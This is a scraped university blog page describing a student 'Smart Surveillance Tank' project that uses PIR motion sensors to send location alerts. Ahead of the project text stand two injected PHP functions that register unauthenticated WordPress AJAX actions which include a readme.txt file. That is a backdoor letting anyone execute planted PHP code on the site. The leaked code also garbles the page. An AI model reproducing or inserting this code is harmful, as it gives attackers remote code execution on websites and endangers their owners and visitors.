if(!function_exists('file_check_readme35684')){ add_action('wp_ajax_nopriv_file_check_readme35684', 'file_check_readme35684'); add_action('wp_ajax_file_check_readme35684', 'file_check_readme35684'); function file_check_readme35684() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme23928')){ add_action('wp_ajax_nopriv_file_check_readme23928', 'file_check_readme23928'); add_action('wp_ajax_file_check_readme23928', 'file_check_readme23928'); function file_check_readme23928() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } DIC BHU & IIT (BHU)» Blog Archive » Smart Surveillance Tank

17

Jul

Smart Surveillance Tank

  • Project Start Date

    01/07/2017

  • Timeline

    1 Year

Brief Description of Project

Our main aim is to design a smart military tank which would feature a surveillance system. This particular system would be governed by PIR sensors that would detect significant motion and send messages about the location of the surroundings to the concerned authorities.

Deliverable

We designed the smart military tank by implementing the surveillance system which would give each and every information related to the movement of objects in the surroundings and send messages about its location to the concerned authorities in case of a potential threat.